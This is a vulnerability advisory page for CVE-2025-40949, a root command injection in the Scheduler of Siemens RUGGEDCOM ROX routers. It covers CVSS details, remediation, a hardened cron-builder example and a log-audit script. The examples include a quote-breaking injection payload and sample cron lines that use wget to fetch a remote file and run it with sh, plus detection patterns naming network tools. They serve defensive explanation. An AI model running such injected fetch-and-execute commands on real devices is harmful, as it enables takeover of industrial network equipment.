
RUGGEDCOM ROX CVE-2025-40949

EUVD-2025-209782 | Severity: HIGH
OS Command Injection (CWE-78)
Published 2026-05-12 | Vendor: siemens | GHSA-pfwq-586r-qjjm
CVSS 4.0 score: 8.9

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: Present
Privileges Required: High
User Interaction: None
Supplemental metrics (S, AU, R, V, RE, U): Not Defined (X). CVSS 4.0 has no Scope metric; the S:X in the vector is the supplemental Safety metric, not Scope.

Lifecycle Timeline (6 events)

Analysis Updated: May 12, 2026 10:37 (vuln.today), v2 (cvss_changed)
Re-analysis Queued: May 12, 2026 10:22 (vuln.today), reason: cvss_changed
Severity Changed: May 12, 2026 10:22 (NVD), CRITICAL -> HIGH
CVSS Changed: May 12, 2026 10:22 (NVD), 9.1 (CRITICAL) -> 8.9 (HIGH)
Analysis Generated: May 12, 2026 10:01 (vuln.today)
CVE Published: May 12, 2026 08:20 (NVD), initial rating CRITICAL 9.1

Description (NVD)

A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions < V2.17.1), RUGGEDCOM ROX MX5000RE (All versions < V2.17.1), RUGGEDCOM ROX RX1400 (All versions < V2.17.1), RUGGEDCOM ROX RX1500 (All versions < V2.17.1), RUGGEDCOM ROX RX1501 (All versions < V2.17.1), RUGGEDCOM ROX RX1510 (All versions < V2.17.1), RUGGEDCOM ROX RX1511 (All versions < V2.17.1), RUGGEDCOM ROX RX1512 (All versions < V2.17.1), RUGGEDCOM ROX RX1524 (All versions < V2.17.1), RUGGEDCOM ROX RX1536 (All versions < V2.17.1), RUGGEDCOM ROX RX5000 (All versions < V2.17.1). Affected devices do not properly sanitize user-supplied input in the Scheduler functionality of the Web UI, allowing commands to be injected into the task scheduling backend.

This could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system.

Analysis (AI)

Command injection in the Siemens RUGGEDCOM ROX industrial router series allows a high-privileged, authenticated remote attacker to execute arbitrary commands as root on the underlying operating system. It affects all MX5000/MX5000RE/RX1400/RX1500/RX1501/RX1510/RX1511/RX1512/RX1524/RX1536/RX5000 models running firmware versions below V2.17.1. The vulnerability exists in the Scheduler functionality of the Web UI due to improper input sanitization (CWE-78). The CVSS v4.0 score of 8.9 reflects high impact on confidentiality, integrity and availability of both the device and subsequent systems (VC/VI/VA:H, SC/SI/SA:H) over a network attack vector, tempered by the need for a high-privileged account (PR:H) and an attack requirement being present (AT:P). No public exploit had been identified at the time of analysis, and EPSS data was not yet available for this recently published CVE.

Technical Context (AI)

This is an OS command injection vulnerability (CWE-78) in the web-based management interface of the Siemens RUGGEDCOM ROX industrial routing platforms. The ROX series runs a Linux-based operating system with a custom web UI for device configuration. The Scheduler functionality, which lets administrators create automated tasks through the web interface, fails to properly sanitize user-supplied input before passing it to the underlying task scheduling backend (the description does not name it; cron or a similar scheduling daemon is the likely candidate). Because the characters a shell interprets (such as ;, |, &, backticks and $( )) are not neutralized, an attacker who controls a scheduler field can break out of the intended command context and append arbitrary shell commands.

The CPE entries for the affected products use the application part (cpe:2.3:a:), i.e., the flaw lives in the ROX firmware rather than in a specific hardware revision, and all listed platforms share the same vulnerable codebase. The result is root-level command execution because the web backend processes scheduler tasks with elevated privileges, a common architectural pattern in embedded industrial devices where the web server runs with system-level access in order to configure networking and system services. Note that PR:H in the vector means the attacker must already hold a high-privileged Web UI account; the vulnerability turns administrative access to the management application into unrestricted root on the underlying OS, which is why confidentiality, integrity and availability are all rated High for both the vulnerable and the subsequent systems.
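To make the pattern concrete, here is an added example (not Siemens code; the real backend, parameter names and file paths are not public, and everything below, including the /etc/cron.d/webui-tasks path and the task names, is an assumption). It shows a naive scheduler backend that splices the submitted command into a shell line, beside a hardened version that allowlists the schedule syntax, replaces the free-form command with a catalogue of predefined actions, and writes the crontab entry through a file API so no shell ever parses user input:

```python
"""Hypothetical model of the CWE-78 pattern described for the ROX Scheduler.

Added example, not Siemens code: the real backend, parameter names and file
paths are not public. All names below are assumptions.
"""
import re
import shlex

CRON_D_FILE = "/etc/cron.d/webui-tasks"  # hypothetical location of the Web UI's tasks


def build_cron_install_vulnerable(schedule: str, command: str) -> str:
    """Return the string a naive backend would hand to sh -c (e.g. via system()).

    Wrapping the entry in single quotes is not a defence: a command value that
    contains a quote closes the literal, and the shell parses the rest as
    further commands.
    """
    return f"echo '{schedule} root {command}' >> {CRON_D_FILE}"


def shell_command_count(line: str) -> int:
    """Count the simple commands /bin/sh would execute for `line`.

    shlex with punctuation_chars=True tokenises ; | & && || on the same
    boundaries the shell uses, so the effect is visible without running sh.
    """
    separators = {";", "|", "&", "&&", "||"}
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    return 1 + sum(1 for tok in lexer if tok in separators)


# Hardened path ----------------------------------------------------------------

# One cron field may contain only digits, '*', ',', '-' and '/'. Day/month names
# and '@daily'-style macros are deliberately not accepted. None of these
# characters mean anything to a shell, and the line is never handed to one.
_CRON_FIELD = r"[0-9*,/-]+"
CRON_SCHEDULE_RE = re.compile(rf"^{_CRON_FIELD}(?: {_CRON_FIELD}){{4}}$")

# Hypothetical catalogue: the Web UI offers named actions; the argv is fixed
# server-side and user input never becomes part of a command string.
TASK_CATALOG = {
    "backup-config": ["/usr/sbin/rox-backup", "--config"],
    "rotate-logs": ["/usr/sbin/logrotate", "/etc/logrotate.conf"],
}


def build_cron_line_hardened(schedule: str, task: str) -> str:
    """Return a crontab entry for an allowlisted task, or raise ValueError."""
    if not CRON_SCHEDULE_RE.fullmatch(schedule):
        raise ValueError(f"rejected schedule: {schedule!r}")
    argv = TASK_CATALOG.get(task)
    if argv is None:
        raise ValueError(f"unknown task: {task!r}")
    # shlex.join quotes each argv element, so the entry stays a single command
    # even if a catalogue path ever contains spaces or metacharacters.
    return f"{schedule} root {shlex.join(argv)}"


def install_task_hardened(schedule: str, task: str, path: str = CRON_D_FILE) -> str:
    """Append the validated entry with a file API; no shell is involved."""
    line = build_cron_line_hardened(schedule, task)
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(line + "\n")
    return line


def is_rejected(schedule: str, task: str) -> bool:
    """True when the hardened builder refuses the input."""
    try:
        build_cron_line_hardened(schedule, task)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    benign = build_cron_install_vulnerable("0 2 * * *", "/usr/sbin/rox-backup --config")
    # Constructed payload: closes the quote, runs an extra command, then reopens
    # the quote so the shell line stays syntactically valid.
    payload = "/usr/sbin/rox-backup'; /usr/bin/id > /tmp/pwned; echo '"
    hostile = build_cron_install_vulnerable("0 2 * * *", payload)
    print(shell_command_count(benign), "command(s):", benign)
    print(shell_command_count(hostile), "command(s):", hostile)
    print(build_cron_line_hardened("0 2 * * *", "backup-config"))
    print(is_rejected("0 2 * * *; /usr/bin/id", "backup-config"))
```

The important design choice is that the hardened path never has a "command" parameter at all: the web layer accepts a task identifier and a schedule, each checked against a strict allowlist, and the operating-system command is chosen server-side. Escaping a free-form command string would be the weaker fix, because every scheduling backend has its own quoting rules (cron, for example, treats `%` specially) and a missed case reopens the injection.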

Remediation (AI)

Upgrade all affected RUGGEDCOM ROX devices to firmware version V2.17.1 or later, which includes proper input sanitization in the Scheduler functionality. Siemens ProductCERT advisory SSA-081142 provides download links and update instructions at https://cert-portal.siemens.com/productcert/html/ssa-081142.html.

Organizations unable to patch immediately should apply compensating controls. Restrict Web UI access to a dedicated management VLAN with strict firewall rules that block access from outside it; this does not change the base score, but in an environmental assessment it corresponds to setting Modified Attack Vector to Adjacent (MAV:A). Because exploitation requires a high-privileged account (PR:H), the remaining controls focus on who can reach that account: enforce multi-factor authentication for administrative access where the device or a fronting access gateway supports it, route administrative sessions through a privileged access management (PAM) solution with session recording so abuse of legitimate credentials can be detected, and rotate administrative credentials if compromise is suspected. Disable the Scheduler functionality entirely if it is not operationally required; this removes the vulnerable code path but also removes the automation it provided, so maintenance tasks or configuration changes that relied on it will need manual intervention.

For detection, deploy network intrusion detection with signatures for command injection attempts against the web parameters associated with task scheduling (if the Web UI is served over TLS, the sensor must sit behind TLS termination or have decryption available to see those parameters), and monitor device logs for unexpected scheduled task creation or modification, particularly tasks that invoke shell commands or scripts. Apply defense in depth by running RUGGEDCOM devices in isolated network segments and monitoring traffic from those segments to critical systems.
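Turning the log-monitoring advice into something runnable, the following added example (not a Siemens or vuln.today tool; the file name, allowlist, baseline snapshot and syslog lines are constructed for illustration) diffs the Web UI's cron.d file against a known-good snapshot and scans cron's own syslog lines for job commands that contain shell metacharacters, download tools, or binaries outside the expected set:

```python
"""Audit scheduler state for the abuse pattern described in CVE-2025-40949.

Added example, not a Siemens or vuln.today tool. It checks two things an
operator can collect from a ROX-class Linux device: the Web UI's cron.d file
against a known-good snapshot, and cron's syslog lines for the commands it
actually ran. File name, task names, allowlist and log lines are constructed.
"""
import re
from typing import Dict, List

# Constructed snapshot of the scheduler file taken at a known-good point in time.
BASELINE_CRON = """\
0 2 * * * root /usr/sbin/rox-backup --config
0 3 * * 0 root /usr/sbin/logrotate /etc/logrotate.conf
"""

# Constructed current content: one entry was appended through the scheduler.
CURRENT_CRON = """\
0 2 * * * root /usr/sbin/rox-backup --config
0 3 * * 0 root /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * root /usr/sbin/rox-backup --config; /usr/bin/wget -q http://198.51.100.7/x -O /tmp/x && sh /tmp/x
"""

# Constructed syslog lines in the format Linux cron daemons emit for each job run.
SAMPLE_SYSLOG = [
    "Mar  3 02:00:01 rox1500 CRON[2311]: (root) CMD (/usr/sbin/rox-backup --config)",
    "Mar  3 02:05:01 rox1500 CRON[2390]: (root) CMD (/usr/sbin/rox-backup --config; "
    "/usr/bin/wget -q http://198.51.100.7/x -O /tmp/x && sh /tmp/x)",
    "Mar  3 02:05:02 rox1500 sshd[2401]: Accepted publickey for admin from 10.0.0.5 port 51234 ssh2",
]

# Hypothetical allowlist: every binary the Web UI scheduler is expected to launch.
ALLOWED_BINARIES = {"/usr/sbin/rox-backup", "/usr/sbin/logrotate"}

CRON_ENTRY_RE = re.compile(r"^(?P<schedule>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")
CRON_LOG_RE = re.compile(r"CRON\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$")
SHELL_META_RE = re.compile(r"[;&|`]|\$\(|/dev/tcp/")
NETWORK_TOOL_RE = re.compile(r"\b(wget|curl|nc|ncat|base64)\b")


def classify_command(cmd: str) -> List[str]:
    """Reasons a scheduled command looks suspicious; an empty list means normal."""
    reasons: List[str] = []
    parts = cmd.split()
    if not parts or parts[0] not in ALLOWED_BINARIES:
        reasons.append("binary-not-allowlisted")
    if SHELL_META_RE.search(cmd):
        reasons.append("shell-metacharacters")
    if NETWORK_TOOL_RE.search(cmd):
        reasons.append("download-or-network-tool")
    return reasons


def parse_cron_entries(text: str) -> Dict[str, str]:
    """Map each non-comment crontab line to its command part."""
    entries: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_ENTRY_RE.match(line)
        if m:
            entries[line] = m.group("cmd")
    return entries


def audit_crontab(baseline: str, current: str) -> List[dict]:
    """Report entries that are new relative to the snapshot or suspicious on content."""
    known = parse_cron_entries(baseline)
    findings: List[dict] = []
    for line, cmd in parse_cron_entries(current).items():
        reasons = [] if line in known else ["not-in-baseline"]
        reasons += classify_command(cmd)
        if reasons:
            findings.append({"entry": line, "reasons": reasons})
    return findings


def audit_syslog(lines: List[str]) -> List[dict]:
    """Flag cron job executions whose command text is suspicious."""
    hits: List[dict] = []
    for line in lines:
        m = CRON_LOG_RE.search(line)
        if not m:
            continue
        reasons = classify_command(m.group("cmd"))
        if reasons:
            hits.append({"user": m.group("user"), "cmd": m.group("cmd"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for f in audit_crontab(BASELINE_CRON, CURRENT_CRON):
        print("crontab:", f["reasons"], f["entry"])
    for h in audit_syslog(SAMPLE_SYSLOG):
        print("syslog :", h["reasons"], h["cmd"])
```

The allowlist and the metacharacter patterns are deliberately narrow; tune ALLOWED_BINARIES to the actions the scheduler is expected to run, and treat any not-in-baseline finding as a change-control question even when the content checks pass, since an attacker who already holds an admin account can schedule a perfectly ordinary-looking binary.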


CVE-2025-40949 vulnerability details – vuln.today
